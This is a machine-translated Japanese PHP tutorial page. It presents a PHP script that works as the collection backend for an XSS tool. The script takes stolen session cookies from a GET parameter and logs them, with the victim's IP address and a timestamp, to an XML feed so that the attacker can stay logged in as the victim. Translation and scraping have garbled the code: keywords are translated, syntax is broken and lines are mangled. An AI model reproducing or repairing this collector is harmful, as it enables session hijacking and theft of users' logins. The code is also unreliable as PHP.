ホームページ >バックエンド開発 >PHPチュートリアル >XSS ツールを使用した PHP スクリプト SessionIE_PHP チュートリアル

XSS ツールを使用した PHP スクリプト SessionIE_PHP チュートリアル

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB
WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBオリジナル
2016-07-13 17:21:38850ブラウズ

これは単なる趣味で書いたものですが、結局のところ、これは単に XML を操作するだけです。原因は、http://www.cncert.net が数日前に私たちのメーリング リストに新しい XSS 利用ツールをリリースしたことに起因すると考えられます。これは、クライアント上で定期的に更新されるものと似ています。セッションがタイムアウトになる可能性があります。攻撃者は、クロスサイトの人物が一度アクセスすると、ログインしたままになる可能性があります。このツールは .net を使用して作成されており、便宜上、Cookie を XML ファイルとして保存するには、Cookie を収集するスクリプトが必要です。彼は ASP プログラムを提供してくれました。私には php スペースしかなかったので、テスト用に php プログラムを書きました。
コード:

date_default_timezone_set("アジア/重慶");

$my_file = "cookie.xml";

if( ! isset( $_GET[x] ) )

{

exit;
$my_cookie = $_GET[x];
if( $_GET[x] != "" )
{

if( ! file_exists( $my_file ) )

AddData( $my_cookie )
; OnFunction CreatexmlFile () {
Global $ My_file;

$ fp = Fopen ($ my_file, "wb");
if (! $ FP) {
exit;}}



;?xml バージョン="1.0" エンコーディング="gb2312" ?> " );
fwrite( $fp, " " );
fwrite( $fp, " " );
fwrite( $fp, "
");
fWrite($ fp、"</rss> ");
function AddData( $my_cookie )
{
global $my_file;

$doc = new DOMDocument( );
$doc->formatOutput = true; if($ _server ["remote_host"]) createElement( "title", $remote_host );
$item->appendChild ( $title ); $refer = "http://yahoo.cn"
}
$link = $doc->createElement; ( "リンク", $refer );
$item->appendChild( $link );
$src_ip = $doc->createElement( " src_ip", $_SERVER["REMOTE_ADDR"] ); >appendChild( $src_ip );

$src_os = $doc->createElement( "src_os", "NotCare" );

$item-> ;appendChild( $src_os );

$pubDate = $doc-> ;createElement( "pubDate", date( "r" ) );
$item->appendChild( $pubDate ); ->createElement( "description", $my_cookie );
$item->appendChild( $description );

$doc->save( $my_file );
?>

www.bkjia.comtru​​ehttp://www.bkjia.com/PHPjc/532402.html技術記事私が書いたのは純粋に趣味のためであり、最終的には XML を操作するだけです。原因は依然として、http://www.cncert.net が数日前に私たちのメーリング リストに新しい x を投稿したことに起因すると考えられています...
声明:
この記事の内容はネチズンが自主的に寄稿したものであり、著作権は原著者に帰属します。このサイトは、それに相当する法的責任を負いません。盗作または侵害の疑いのあるコンテンツを見つけた場合は、admin@php.cn までご連絡ください。